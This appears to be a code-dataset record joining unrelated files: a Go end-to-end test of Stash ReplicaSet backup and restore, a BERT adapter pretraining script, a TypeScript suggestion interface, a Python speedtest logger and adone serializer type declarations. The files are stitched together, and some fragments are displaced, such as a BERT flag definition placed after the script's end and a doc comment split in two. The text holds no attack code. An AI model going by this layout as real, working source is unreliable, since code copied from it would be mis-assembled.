"stash.appscode.dev/apimachinery/apis/stash/v1beta1"
"stash.appscode.dev/stash/test/e2e/framework"
. "stash.appscode.dev/stash/test/e2e/matcher"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
var _ = Describe("ReplicaSet", func() {
var f *framework.Invocation
BeforeEach(func() {
f = framework.NewInvocation()
})
JustAfterEach(func() {
f.PrintDebugInfoOnFailure()
})
AfterEach(func() {
err := f.CleanupTestResources()
Expect(err).NotTo(HaveOccurred())
})
Context("ReplicaSet", func() {
Context("Restore in same ReplicaSet", func() {
It("should Backup & Restore in the source ReplicaSet", func() {
// Deploy a ReplicaSet
rs, err := f.DeployReplicaSet(framework.SourceReplicaSet, int32(1), framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
// Generate Sample Data
sampleData, err := f.GenerateSampleData(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Setup a Minio Repository
repo, err := f.SetupMinioRepository()
Expect(err).NotTo(HaveOccurred())
// Setup workload Backup
backupConfig, err := f.SetupWorkloadBackup(rs.ObjectMeta, repo, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Take an Instant Backup of the Sample Data
backupSession, err := f.TakeInstantBackup(backupConfig.ObjectMeta, v1beta1.BackupInvokerRef{
Name: backupConfig.Name,
Kind: v1beta1.ResourceKindBackupConfiguration,
})
Expect(err).NotTo(HaveOccurred())
By("Verifying that BackupSession has succeeded")
completedBS, err := f.StashClient.StashV1beta1().BackupSessions(backupSession.Namespace).Get(context.TODO(), backupSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedBS.Status.Phase).Should(Equal(v1beta1.BackupSessionSucceeded))
// Simulate disaster scenario. Delete the data from source PVC
By("Deleting sample data from source ReplicaSet")
err = f.CleanupSampleDataFromWorkload(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Restore the backed up data
By("Restoring the backed up data in the original ReplicaSet")
restoreSession, err := f.SetupRestoreProcess(rs.ObjectMeta, repo, apis.KindReplicaSet, framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
By("Verifying that RestoreSession succeeded")
completedRS, err := f.StashClient.StashV1beta1().RestoreSessions(restoreSession.Namespace).Get(context.TODO(), restoreSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedRS.Status.Phase).Should(Equal(v1beta1.RestoreSessionSucceeded))
// Get restored data
restoredData := f.RestoredData(rs.ObjectMeta, apis.KindReplicaSet)
// Verify that restored data is same as the original data
By("Verifying restored data is same as the original data")
Expect(restoredData).Should(BeSameAs(sampleData))
})
})
Context("Restore in different ReplicaSet", func() {
It("should restore backed up data into different ReplicaSet", func() {
// Deploy a ReplicaSet
rs, err := f.DeployReplicaSet(framework.SourceReplicaSet, int32(1), framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
// Generate Sample Data
sampleData, err := f.GenerateSampleData(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Setup a Minio Repository
repo, err := f.SetupMinioRepository()
Expect(err).NotTo(HaveOccurred())
// Setup workload Backup
backupConfig, err := f.SetupWorkloadBackup(rs.ObjectMeta, repo, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Take an Instant Backup of the Sample Data
backupSession, err := f.TakeInstantBackup(backupConfig.ObjectMeta, v1beta1.BackupInvokerRef{
Name: backupConfig.Name,
Kind: v1beta1.ResourceKindBackupConfiguration,
})
Expect(err).NotTo(HaveOccurred())
By("Verifying that BackupSession has succeeded")
completedBS, err := f.StashClient.StashV1beta1().BackupSessions(backupSession.Namespace).Get(context.TODO(), backupSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedBS.Status.Phase).Should(Equal(v1beta1.BackupSessionSucceeded))
// Deploy restored ReplicaSet
restoredRS, err := f.DeployReplicaSet(framework.RestoredReplicaSet, int32(1), framework.RestoredVolume)
Expect(err).NotTo(HaveOccurred())
// Restore the backed up data
By("Restoring the backed up data in different ReplicaSet")
restoreSession, err := f.SetupRestoreProcess(restoredRS.ObjectMeta, repo, apis.KindReplicaSet, framework.RestoredVolume)
Expect(err).NotTo(HaveOccurred())
By("Verifying that RestoreSession succeeded")
completedRS, err := f.StashClient.StashV1beta1().RestoreSessions(restoreSession.Namespace).Get(context.TODO(), restoreSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedRS.Status.Phase).Should(Equal(v1beta1.RestoreSessionSucceeded))
// Get restored data
restoredData := f.RestoredData(restoredRS.ObjectMeta, apis.KindReplicaSet)
// Verify that restored data is same as the original data
By("Verifying restored data is same as the original data")
Expect(restoredData).Should(BeSameAs(sampleData))
})
})
Context("Leader election for backup and restore ReplicaSet", func() {
It("Should leader elect and backup and restore ReplicaSet", func() {
// Deploy a ReplicaSet
rs, err := f.DeployReplicaSet(framework.SourceReplicaSet, int32(2), framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
// Generate Sample Data
sampleData, err := f.GenerateSampleData(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Setup a Minio Repository
repo, err := f.SetupMinioRepository()
Expect(err).NotTo(HaveOccurred())
// Setup workload Backup
backupConfig, err := f.SetupWorkloadBackup(rs.ObjectMeta, repo, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
By("Waiting for leader election")
f.CheckLeaderElection(rs.ObjectMeta, apis.KindReplicaSet, v1beta1.ResourceKindBackupConfiguration)
// Take an Instant Backup of the Sample Data
backupSession, err := f.TakeInstantBackup(backupConfig.ObjectMeta, v1beta1.BackupInvokerRef{
Name: backupConfig.Name,
Kind: v1beta1.ResourceKindBackupConfiguration,
})
Expect(err).NotTo(HaveOccurred())
By("Verifying that BackupSession has succeeded")
completedBS, err := f.StashClient.StashV1beta1().BackupSessions(backupSession.Namespace).Get(context.TODO(), backupSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedBS.Status.Phase).Should(Equal(v1beta1.BackupSessionSucceeded))
// Simulate disaster scenario. Delete the data from source PVC
By("Deleting sample data from source ReplicaSet")
err = f.CleanupSampleDataFromWorkload(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Restore the backed up data
By("Restoring the backed up data in the original ReplicaSet")
restoreSession, err := f.SetupRestoreProcess(rs.ObjectMeta, repo, apis.KindReplicaSet, framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
By("Verifying that RestoreSession succeeded")
completedRS, err := f.StashClient.StashV1beta1().RestoreSessions(restoreSession.Namespace).Get(context.TODO(), restoreSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedRS.Status.Phase).Should(Equal(v1beta1.RestoreSessionSucceeded))
// Get restored data
restoredData := f.RestoredData(rs.ObjectMeta, apis.KindReplicaSet)
// Verify that restored data is same as the original data
By("Verifying restored data is same as the original data")
Expect(restoredData).Should(BeSameAs(sampleData))
})
})
})
})
| |
run_pretraining_adapter.py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run masked LM/next sentence masked_lm pre-training for BERT."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from retrograph.modeling import modeling_adapter as modeling
from retrograph.modeling import optimization_adapter as optimization
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string(
"input_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_integer(
|
flags.DEFINE_integer(
"max_predictions_per_seq", 20,
"Maximum number of masked LM predictions per sequence. "
"Must match data generation.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.")
flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
masked_lm_positions = features["masked_lm_positions"]
masked_lm_ids = features["masked_lm_ids"]
masked_lm_weights = features["masked_lm_weights"]
next_sentence_labels = features["next_sentence_labels"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(
bert_config, model.get_sequence_output(), model.get_embedding_table(),
masked_lm_positions, masked_lm_ids, masked_lm_weights)
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = get_next_sentence_output(
bert_config, model.get_pooled_output(), next_sentence_labels)
total_loss = masked_lm_loss + next_sentence_loss
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels):
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(masked_lm_ids, [-1])
masked_lm_weights = tf.reshape(masked_lm_weights, [-1])
masked_lm_accuracy = tf.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(next_sentence_labels, [-1])
next_sentence_accuracy = tf.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.metrics.mean(
values=next_sentence_example_loss)
return {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
eval_metrics = (metric_fn, [
masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels
])
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
eval_metrics=eval_metrics,
scaffold_fn=scaffold_fn)
else:
raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode))
return output_spec
return model_fn
def get_masked_lm_output(bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling.get_activation(bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
bert_config.initializer_range))
input_tensor = modeling.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
def get_next_sentence_output(bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.variable_scope("cls/seq_relationship"):
output_weights = tf.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling.create_initializer(bert_config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def gather_indexes(sequence_tensor, positions):
"""Gathers the vectors at the specific positions over a minibatch."""
sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3)
batch_size = sequence_shape[0]
seq_length = sequence_shape[1]
width = sequence_shape[2]
flat_offsets = tf.reshape(
tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
flat_positions = tf.reshape(positions + flat_offsets, [-1])
flat_sequence_tensor = tf.reshape(sequence_tensor,
[batch_size * seq_length, width])
output_tensor = tf.gather(flat_sequence_tensor, flat_positions)
return output_tensor
def input_fn_builder(input_files,
max_seq_length,
max_predictions_per_seq,
is_training,
num_cpu_threads=4):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
name_to_features = {
"input_ids":
tf.FixedLenFeature([max_seq_length], tf.int64),
"input_mask":
tf.FixedLenFeature([max_seq_length], tf.int64),
"segment_ids":
tf.FixedLenFeature([max_seq_length], tf.int64),
"masked_lm_positions":
tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_ids":
tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_weights":
tf.FixedLenFeature([max_predictions_per_seq], tf.float32),
"next_sentence_labels":
tf.FixedLenFeature([1], tf.int64),
}
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
if is_training:
d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files))
d = d.repeat()
d = d.shuffle(buffer_size=len(input_files))
# `cycle_length` is the number of parallel files that get read.
cycle_length = min(num_cpu_threads, len(input_files))
# `sloppy` mode means that the interleaving is not exact. This adds
# even more randomness to the training pipeline.
d = d.apply(
tf.contrib.data.parallel_interleave(
tf.data.TFRecordDataset,
sloppy=is_training,
cycle_length=cycle_length))
d = d.shuffle(buffer_size=100)
else:
d = tf.data.TFRecordDataset(input_files)
# Since we evaluate for a fixed number of steps we don't want to encounter
# out-of-range exceptions.
d = d.repeat()
# We must `drop_remainder` on training because the TPU requires fixed
# size dimensions. For eval, we assume we are evaluating on the CPU or GPU
# and we *don't* want to drop the remainder, otherwise we wont cover
# every sample.
d = d.apply(
tf.contrib.data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
num_parallel_batches=num_cpu_threads,
drop_remainder=True))
return d
return input_fn
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
if not FLAGS.do_train and not FLAGS.do_eval:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
tf.gfile.MakeDirs(FLAGS.output_dir)
input_files = []
for input_pattern in FLAGS.input_file.split(","):
input_files.extend(tf.gfile.Glob(input_pattern))
tf.logging.info("*** Input Files ***")
for input_file in input_files:
tf.logging.info(" %s" % input_file)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
keep_checkpoint_max=20,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=FLAGS.num_train_steps,
num_warmup_steps=FLAGS.num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size)
if FLAGS.do_train:
tf.logging.info("***** Running training *****")
tf.logging.info(" Batch size = %d", FLAGS.train_batch_size)
train_input_fn = input_fn_builder(
input_files=input_files,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=True)
estimator.train(input_fn=train_input_fn, max_steps=FLAGS.num_train_steps)
if FLAGS.do_eval:
tf.logging.info("***** Running evaluation *****")
tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size)
eval_input_fn = input_fn_builder(
input_files=input_files,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=False)
result = estimator.evaluate(
input_fn=eval_input_fn, steps=FLAGS.max_eval_steps)
output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt")
with tf.gfile.GFile(output_eval_file, "w") as writer:
tf.logging.info("***** Eval results *****")
for key in sorted(result.keys()):
tf.logging.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
if __name__ == "__main__":
flags.mark_flag_as_required("input_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
|
"max_seq_length", 128,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded. Must match data generation.")
|
suggestion.model.ts
|
import { Facet } from './facet/facet.model';
import { NamedModel } from './named-model.model';
import { Previewable } from './previewable.model';
/**
* A suggestion represents a query that has been proposed to the user, due of being popular,
* matching with the current search query...
|
*
* @public
*/
export interface Suggestion extends NamedModel<'QuerySuggestion' | 'PopularSearch'>, Previewable {
// eslint-disable-next-line jsdoc/require-description-complete-sentence
/** {@inheritDoc Previewable.facets} */
facets: Facet[];
/**
* Unique identifier of the suggestion.
*
* @deprecated - The key field should be calculated if needed using the `query` and the
* `facets` properties.
*/
key: string;
}
| |
speed_test.py
|
import datetime
import logging
import sys
from speedtest import Speedtest
from conntestd.db import get_db_session
from conntestd.db import SpeedTestResult
from conntestd.config import DB_CONN
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
level=logging.INFO,
stream=sys.stdout)
def run_speedtest():
|
logging.info("Starting periodic connection test job.")
db = get_db_session(DB_CONN)
db_result = SpeedTestResult(dt=datetime.datetime.now(),
status='running')
db.add(db_result)
db.commit()
try:
s = Speedtest()
s.get_best_server()
s.download()
s.upload()
result = s.results.dict()
download = result['download']
upload = result['upload']
ping = result['ping']
country = result['server']['country']
town = result['server']['name']
sponsor = result['server']['sponsor']
db_result.status = 'complete'
db_result.download = download
db_result.upload = upload
db_result.ping = ping
db_result.country = country
db_result.town = town
db_result.sponsor = sponsor
db.commit()
logging.info("Periodic connection test job completed.")
except Exception as err:
logging.error("Error occured during periodic connection test job: %s" % str(err))
db_result.status = 'error'
db.commit()
finally:
db.close()
|
|
data.d.ts
|
declare namespace adone {
/**
* Various data [de]serializers
*/
namespace data {
/**
* JSON encoder
*/
namespace json {
namespace I {
type Replacer = ((key: string, value: any) => any) | string[];
interface CompareValue {
key: string;
value: any;
}
type CompareFunction = (a: CompareValue, b: CompareValue) => number;
}
/**
* Actually, the same as JSON.stringify, but returns a buffer
*/
function encode(obj: any, options?: {
/**
* A String or Number object that's used to insert white space into the output JSON string for readability purposes
*/
space?: string,
/**
* A function that alters the behavior of the stringification process,
* or an array of String and Number objects that serve as a whitelist
* for selecting/filtering the properties of the value object to be included in the JSON string
*/
replacer?: I.Replacer
}): Buffer;
/**
* Decodes JSON string or buffer
*/
function decode(buf: string | Buffer): any;
/**
* Deterministic version of JSON.stringify() so you can get a consistent hash from stringified results
*/
function encodeStable(obj: any, options?: {
/**
* Indent spaces for pretty-printing
*/
space?: string,
/**
* Whether to allow circular JSON structure
*/
cycles?: boolean,
/**
* A function that alters the behavior of the stringification process,
* or an array of String and Number objects that serve as a whitelist
* for selecting/filtering the properties of the value object to be included in the JSON string
*/
replacer?: I.Replacer,
/**
* Custom comparison function for object keys
*/
cmp?: I.CompareFunction
}): string;
function encodeSafe(obj: any): string;
function decodeSafe(str: string): any;
}
/**
* MessagePack encoder
*/
namespace mpak {
/**
* Encodes the given object
*/
function encode(obj: any): Buffer;
/**
* Decoder the given buffer
*/
function decode(buf: collection.I.ByteArray.Wrappable): any;
namespace I {
type Type = string | number; // ?
type DecodeFunction = (buf: collection.ByteArray) => any;
type EncodeFunction = (x: any) => collection.ByteArray;
type EncodeCheckFunction = (x: any) => boolean;
interface DecodingType {
/**
* Value type
*/
type: Type;
/**
* Decode function
*/
decode: DecodeFunction;
}
interface EncodingType {
/**
* Value type
*/
type: Type;
/**
* Encode function
*/
encode: EncodeFunction;
/**
* Check function
*/
check: EncodeCheckFunction;
}
}
/**
* Represents a MessagePack encoder
*/
class Encoder {
constructor(encodingTypes: I.EncodingType[]);
/**
* Encodes the given value
*/
encode<T extends collection.ByteArray = collection.ByteArray>(x: any, buf?: T): T;
}
/**
* Represents a MessagePack decoder
*/
class Decoder {
constructor(decodingTypes: I.DecodingType[]);
/**
* Decodes the given buffer
*/
decode(buf: collection.I.ByteArray.Wrappable): any;
/**
* Decodes the given ByteArray buffer, but does not throw IncompleteBufferError if the size is invalid
*/
tryDecode(buf: collection.ByteArray): any;
}
/**
* Represents a MessagePack serializer
*/
class Serializer {
/**
* Encoder instance
*/
readonly encoder: Encoder;
/**
* Decoder instance
*/
readonly decoder: Decoder;
/**
* Registers an encoder for the given type
*
* @param type type identifier
* @param check type predicate
* @param encode type encoder
*/
registerEncoder(type: I.Type, check: I.EncodeCheckFunction, encode: I.EncodeFunction): this;
/**
* Registers a decoder for the given type
*
* @param type type identifier
* @param decode type decoder
*/
registerDecoder(type: I.Type, decode: I.DecodeFunction): this;
/**
* Registers encoder/decoder functions for the given type and constructor
*
* @param type type identifier
* @param constructor type constructor, used in the predicate function (instanceof)
* @param encode type encoder
* @param decode type decoder
*/
register<T>(
type: I.Type,
constructor: { new (...args: any[]): T },
encode: (x: T, buf: collection.ByteArray) => void,
decode: (buf: collection.ByteArray) => T
): this;
/**
* Encodes the given value
*/
encode<T extends collection.ByteArray = collection.ByteArray>(x: any, buf?: T): T;
/**
* Decodes the given buffer
*/
decode(buf: collection.I.ByteArray.Wrappable, needFlip?: boolean): any;
}
/**
* An instance of default adone serializer with registered encoders/decoders for standard js/adone types like
* x.Exception, Error, Date, Map, Set, math.Long
*/
const serializer: Serializer;
}
/**
* JSON5 encoder
*/
namespace json5 {
/**
* Encodes the given value
*/
function encode(obj: any, options?: {
/**
* Indent spaces for pretty-printing
*/
space?: string,
/**
* A function that alters the behavior of the stringification process,
* or an array of String and Number objects that serve as a whitelist
* for selecting/filtering the properties of the value object to be included in the JSON string
*/
replacer?: ((key: string, value: any) => any) | string[]
}): Buffer;
/**
* Decodes the given string/buffer
*/
function decode(buf: string | Buffer, reviver?: (holder: object, key: string, value: any) => any): any;
}
/**
* Base64 encoder
*/
namespace base64 {
/**
* Encodes a string/Buffer to base64
*/
function encode(str: string | Buffer, options: { buffer: false }): string;
function encode(str: string | Buffer, options?: { buffer?: true }): Buffer;
/**
* Decodes base64 string/buffer into a buffer
*/
function decode(str: string | Buffer, options: { buffer: true }): Buffer;
/**
* Decodes base64 string/buffer into a string
*/
function decode(str: string | Buffer, options?: { buffer?: false }): string;
function encodeVLQ(value: number): string;
function decodeVLQ(value: string, index: number | undefined, rest: true): { value: number, index: number };
function decodeVLQ(value: string, index?: number, rest?: boolean): number;
/**
* Maps a character to a base64 number
*/
function decodeCharCode(c: string): number;
/**
* Maps a number to a base64 character
*/
function decodeNumber(n: number): string;
}
/**
* YAML encoder
*/
namespace yaml {
/**
* YAML loaders
*/
namespace loader {
namespace I {
interface Options {
/**
* String to be used as a file path in error/warning messages. Default: null
*/
filename?: string;
/**
* Specifies a schema to use
*/
schema?: schema.Schema;
/**
* Function to call on warning messages.
* Loader will throw on warnings if this function is not provided
*/
onWarning?(warning: any): void;
/**
* Compatibility with JSON.parse behaviour.
* If true, then duplicate keys in a mapping will override values rather than throwing an error
*/
json?: boolean;
}
}
/**
* Same as safeLoadAll() but uses DEFAULT_FULL by default
*/
function loadAll(input: string | Buffer, iterator: (doc: any) => void, options?: I.Options): void;
function loadAll(input: string | Buffer, iterator?: undefined, options?: I.Options): any[];
/**
* The same as safeLoad() but uses DEFAULT_FULL_SCHEMA by default - adds some JavaScript-specific types: !!js/function, !!js/regexp and !!js/undefined.
* For untrusted sources, you must additionally validate object structure to avoid injections
*/
function load(input: string | Buffer, options?: I.Options): any;
/**
* Parses string as single YAML document. Returns a JavaScript object or throws YAMLException on error.
* By default, does not support regexps, functions and undefined.
* This method is safe for untrusted data
*/
function safeLoadAll(input: string | Buffer, iterator: (doc: any) => void, options?: I.Options): void;
function safeLoadAll(input: string | Buffer, iterator?: undefined, options?: I.Options): any[];
/**
* Same as safeLoad(), but understands multi-document sources.
